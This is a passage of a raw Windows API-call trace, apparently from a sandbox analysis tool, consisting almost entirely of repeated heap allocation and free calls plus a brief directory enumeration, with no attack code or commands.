1 [0197.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49900 [0197.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0197.894] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa910bfb0, ftCreationTime.dwHighDateTime=0x1d89773, ftLastAccessTime.dwLowDateTime=0x834fbba0, ftLastAccessTime.dwHighDateTime=0x1d89778, ftLastWriteTime.dwLowDateTime=0x834fbba0, ftLastWriteTime.dwHighDateTime=0x1d89778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LzHDQsiji02", cAlternateFileName="LZHDQS~1")) returned 0 [0197.894] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0197.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0197.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a88 | out: hHeap=0x6a0000) returned 1 [0197.895] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0197.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0197.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0197.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eea0 | out: hHeap=0x6a0000) returned 1 [0197.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0197.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ef48 | out: hHeap=0x6a0000) returned 1 [0197.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0197.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee4f0 | out: hHeap=0x6a0000) returned 1 [0197.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49848 | out: hHeap=0x6a0000) returned 1 [0197.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47bb8 | out: hHeap=0x6a0000) returned 1 [0197.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0197.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b578 [0197.899] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0197.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 